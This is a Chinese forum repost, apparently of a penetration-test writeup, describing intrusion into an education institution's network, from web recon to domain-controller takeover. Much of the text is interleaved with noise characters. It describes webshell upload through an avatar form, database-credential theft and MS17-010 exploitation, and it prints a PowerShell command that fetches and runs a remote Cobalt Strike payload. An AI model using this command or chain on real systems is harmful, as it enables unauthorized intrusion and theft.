|
! y, Z- p0 I `' l1 z! M2 }7 H: c
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
. P+ p; M9 {1 ^+ h) R9 u- F 6 N2 y# ?8 X4 x% B
$ c& d1 _, p$ Q
( \4 U# I' b6 l; U* ?6 _
- w; ? ~% \/ J# u6 A3 u) z5 w5 s- q9 v C1 W2 l+ i- Z
正文
1 L% J7 F. m$ x. {5 S: x
: s2 T; R* F0 z, B8 Z3 O! C. t% m6 [
0 ]* J9 X7 n3 j) D& L' v $ T( n2 U, \# @ f9 f1 w! w F
, i2 r& v4 V( `5 H7 J3 D7 | 目标:www.xxxx.com(一家教育机构)
! P5 a2 J( @& X8 S; d6 B, U' f4 ~
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能1 H/ S$ F1 x6 y- ]' m
, { u3 q8 k t* z
# x- l# c, c& a! L! [0 i5 ]
* F5 Q1 V4 B0 S" c# D 4 j7 b' f: ?4 G& y% G" H
( y# ~8 ^! ]. F$ l$ O
进行了简单的信息搜集
; K5 W9 i3 ?! X7 I' ]
1 J0 z ?3 }4 [9 H! G b4 j7 i t9 m* A! v) _! e9 C! z
" _; |2 z u8 u! g
@3 G" y1 g( t5 V1 Z/ K
子域名搜集 ~9 q+ N% Q) B) c) \
3 y+ q |" _5 g
5 Q3 J) Z# R+ c* e 
" V+ L* Q+ a/ a2 E5 N # ^+ A2 a# R) a% c/ D
1 O! t/ N& O8 U. z: w% v2 Y
fofa找资产
1 U9 G( D- {/ O4 d- T
! V0 H* U( E6 a+ w( ]: `0 p' h/ P- P- `
# f6 ]" f0 n9 H 2 \* J& M6 L' t4 `; X0 J, N* x5 ^
0 {" n; _) j2 z! x7 \- f3 k 
7 d% K1 R2 W) g3 o
& L. h9 k) l4 Q, l
4 z; ]0 u& r$ Q) g+ Z. @ 一共七个资产。去重之后只有两个。
$ F0 m* E& t' N7 K5 \
7 i8 Y; r' V& g
$ V- ]5 h2 k' k9 X+ Q6 v' P2 U
& P: |6 I5 e. c7 t& f
* H: G% y- I0 m, K) t7 y7 f& ^6 U- K 目录探测: W8 U4 d. v) i' \6 C
+ d7 n4 Q( L9 c% F
# }7 K7 q8 m2 z% k3 R0 _  A( p* B" A! F" {8 k
m; }5 [8 S9 u( L' c0 P$ r
/ \5 R6 b$ t% ^ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
; e" N/ y' e4 V( P
8 a9 O, k% x; |0 F Q* a( D" g
; t, t) k Q) g2 h" N( C& { ( f% _ g' r, m3 r# V% J
5 ~) B4 E9 U4 Q. g! J2 A 我又尝试了通过修改返回包来绕过登录界面) G1 Z- a Z- E) ]
/ p: d1 \7 H( @$ v5 ?2 F+ I A: [# v2 p) _
 * r4 l7 I/ a- e2 }) u
) {; z7 B) i2 x8 @8 _1 u+ i1 }8 _6 z, a0 A# t, N4 ]$ `! o, r! Z, G5 h
还是不行,尝试注入无果& o; }9 o& }6 |# ~8 X
- S5 l. {. m4 ?- @" [
a. M, B& C/ `/ v4 q% G& a 
2 U- L# s- o8 M" V, @, N 6 a( q/ G4 i7 p. h. d( |: @- u
; y$ B6 K$ }% @* p9 @/ x' @' }
不过我目录探测出了一处Spring信息泄露
1 c4 t$ k8 B) S8 X3 }1 T$ ?' M
& y) B3 s- u8 l. A& N4 W. L% n; `+ n
0 R. z! w b! ^4 H' ]/ T
^$ [/ W6 i) q( G, ~; h. e; g7 n4 J" w% R! ^- ^& A* e+ b
' r! W* m/ V" h5 E5 W5 L 5 i) P! M7 B% t6 Y1 g) G& h
2 d4 y- a3 [8 ~# i5 {5 f. p
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 J6 o' I; Q1 N8 b' e
$ E8 c5 ?- A( i" J3 B( B7 `
% e; K- \6 T0 p( c \ 
$ `3 T6 Y- H4 s( @; M; d % T9 z7 Y+ `% T9 H9 N5 B |
1 N+ _/ S, L! w3 G+ H
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。: A' B' Y, \1 E* k' Q8 c/ D
1 ]7 s+ X8 \) q' e
5 U8 L% S9 U% i/ Q$ d; b2 v0 Y' C9 n, J 
: k Y3 s8 U3 b# h2 l# L ! r' U4 X0 e p( {/ R( h5 q9 j- n
* C3 D8 _- E- _5 A d. Q4 v
获取有些师傅到这一步就手机抓包电脑测了。+ _$ @) Y/ I! G# v% ] ]
7 @% x6 U% P" \( [' N( y% G5 a$ r
" Q0 |/ q1 H6 x8 i6 z
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
7 R, E$ |4 |; w
L7 V' F3 e7 [
Z- \) N G$ o6 b- a2 g 其中在一个公众号发现了小程序,可以进行注册。
% z N* ^8 \1 M- _7 j4 ] ; J7 S; }9 d7 ^4 J
4 V5 T" n& U0 {! ? 看到了头像上传,尝试上传获取WebShell
% R' m5 e$ @3 U2 T! j
! m: K# y; T. o5 Y8 D* v/ h$ M i+ Q3 A; `5 j& S0 \5 ^$ {
 & I$ ?, m# I' ?6 V7 ]3 E+ j# M+ R
8 h: u5 u/ t* k- u
0 G* g3 q6 J3 F. @ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问) i& f9 Q2 D: \2 k/ |. d
0 C/ o( b) t3 d/ d' k
8 Y h7 a3 r% I$ e6 G
) [' l+ ~7 A+ G6 ^' u 4 b4 m, D1 k0 \, N5 Y, |7 b
( u5 x) v( ?1 |5 J8 r 然后上了大马0 B4 r/ M/ H6 r5 I2 Q
1 J; c, {; Y( |9 `* n
9 u! P; O2 |$ v d& `2 o/ ?' ]
 2 Y \3 l9 t( _- h
$ I. ]) e0 @' r& E3 p, l- Q: W7 j( H" i
9 L1 X* J" f6 o9 G8 d; G 
6 {$ C. O' D" Q8 Q
3 A, ]- e2 H1 Y: N9 r8 ~: C# @. `
通过翻找文件发现数据库账号密码
5 ], j4 J2 P2 X$ K
- T& ]3 V) B D% f( h$ I( z( d- S4 A0 t
 1 R: I1 u+ b) t1 T1 v
0 h5 _. ~- M, Y1 a8 D- _! @3 H
v Z Q4 y6 y --内网渗透; J3 r, c7 A# t* U; b9 {' C. t
8 A( w7 B J) t1 @3 u" Y
4 u( @0 G. y, j% G 直接通过powershell执行 cs上线
$ V( ~3 d' G1 G $ A' R2 J. }- P6 @. r% A
" j9 |% ]7 m# s0 \' t0 p0 a
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"; A+ H2 l/ B( t: V& r g+ p( r
( ?# [! G5 Q: U) A. G
f% j; J% e* P/ m2 x 
- P! ?+ R H. y
5 [: N! H5 ]6 w* N* ?7 S; g6 g; U; m, r. v# q9 g
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
3 N* j3 y# `' e. r 5 l+ X+ q- T1 w
# @8 Z0 b1 E8 L, H! H; |- W$ Q 
1 Z- \, ~7 P8 Y$ C5 e5 ?) |
, R3 J, b& K$ `/ ]( T; P
( @( }3 x9 y; O8 T# e& q1 r, N 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
6 d+ w- c! _, N" C# L
, H" X, D+ T0 e+ I
+ E1 h: J$ b9 B! Q: E' M3 e6 t5 g! @% R
& {7 |$ `# q+ I: s7 v6 I0 v( H
" x" u _. o3 j3 d/ a  $ ?2 A" C, S5 V5 {1 E: \- f4 J
, |1 A0 u! e! l* R% ^0 ]) [* N2 m. E5 N. v
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
' ]3 {" w3 d! h7 z8 j& w# u
6 l" l8 F$ }& @, }$ Y
# X% U! \6 k+ {! L* \2 m. }- c! D' @
* D, p2 k+ }4 C0 R" X7 l8 O# Q5 F, s2 ?) l' P1 r- ]
' i/ }; W: N: s- p ) x) _2 X, K2 l& j
5 M* d3 O1 f! {) \1 Z
) M! m1 j* g1 z# v3 G; F" O
3 O+ a# M4 I( {2 `4 j" u! B$ a1 X) [1 v7 [" _9 d
. d8 D y3 n: Z9 @2 q
0 L l7 I3 _8 d 9 j$ o: E2 y/ g
. [4 I+ x P- p1 B3 v6 M) Y% N
0 \4 i7 A# @; y
小结
% J0 j* q; C4 o& H; W
+ x C6 x u* m% W/ |% F, L) E% \) K& ^# F7 z
: G. g, b; m: o% G
9 W( k1 K. x) \& z% c0 u
6 [6 H* y' e. P/ z1 j" s
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
, b* Y. S' i9 f% f 7 }# a+ j2 a# @0 n7 u1 y/ K7 y, R
r% X, w, x* d1 A + f& Z' i+ ]6 W# o4 X
! ~, s' \7 E0 J
. s' x q8 _9 J. R/ F8 p - ) f" t% n& e. q5 j {
, R b4 s: s) Y2 r
& w1 W0 C }; {5 b% Q
-
7 Y4 p- o. @" a" r+ M" F7 U 0 T/ @' A9 ~, u: e: `4 ~
+ @' y1 c2 e& b7 m; ]- Y& ?
* L4 \$ H0 }) g0 K7 ^6 c/ S/ A) E2 ^# E/ e" z
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
2 n" ` `% P% Q" }, V - A) ~- m5 [! ~5 ~8 o2 ~( j9 r
9 X: } g9 E# z9 _: o' _
* U" m1 ?5 F9 t) x5 w9 }. c | 
发表于 2024-3-1 19:41:32
收藏
支持
反对